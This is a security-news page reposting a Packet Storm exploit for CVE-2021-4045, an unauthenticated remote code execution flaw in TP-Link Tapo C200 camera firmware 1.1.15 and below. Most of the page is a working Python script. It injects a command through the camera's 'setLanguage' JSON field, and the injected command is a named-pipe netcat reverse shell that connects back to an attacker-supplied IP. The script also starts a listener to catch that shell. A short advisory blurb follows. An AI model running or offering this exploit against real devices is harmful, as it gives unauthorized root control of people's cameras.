Security
Headlines
HeadlinesLatestCVEs

Headline

TP-Link Tapo c200 1.1.15 Remote Code Execution

TP-Link Tapo c200 version 1.1.15 suffers from a remote code execution vulnerability.

Packet Storm
#vulnerability#js#rce#auth
# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)# Date: 02/11/2022# Exploit Author: hacefresko# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/# Version: 1.1.15 and below# Tested on: 1.1.11, 1.1.14 and 1.1.15# CVE : CVE-2021-4045# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rceimport requests, urllib3, sys, threading, osurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)PORT = 1337REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)if len(sys.argv) < 3:    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")    exit()victim = sys.argv[1]attacker = sys.argv[2]print("[+] Listening on %d" % PORT)t = threading.Thread(target=os.system, args=(NC_COMMAND,))t.start()print("[+] Serving payload to %s\n" % victim)url = "https://" + victim + ":443/"json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}requests.post(url, json=json, verify=False)

Related news

CVE-2021-4045: TP-LINK Tapo C200 remote code execution vulnerability

TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.

Packet Storm: Latest News

Debian Security Advisory 5804-1